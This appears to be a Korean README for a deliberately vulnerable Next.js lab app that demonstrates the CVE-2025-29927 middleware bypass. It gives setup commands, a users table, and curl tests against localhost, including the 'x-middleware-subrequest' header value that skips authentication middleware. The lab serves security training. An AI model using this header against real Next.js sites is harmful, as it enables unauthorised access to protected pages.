
의도적으로 취약하게 만든 Next.js 애플리케이션으로, CVE-2025-29927 미들웨어 우회 익스플로잇을 시연하며 보안 테스트 및 교육 연습을 위한 것입니다.
npx [email protected]
npm install -D @types/bcrypt
npm install mysql2
npm install jose
npm install -D @types/jsonwebtoken
CREATE TABLE users (
id INT PRIMARY KEY AUTO_INCREMENT,
username VARCHAR(255) UNIQUE NOT NULL,
password VARCHAR(255) NOT NULL
);
npm run dev
# 테스트를 위해 일부 사용자 등록.
curl http://localhost:3000/api/register
# 헤더 포함 또는 미포함으로 대시보드에 curl 요청:
# "x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware"
curl http://localhost:3000/dashboard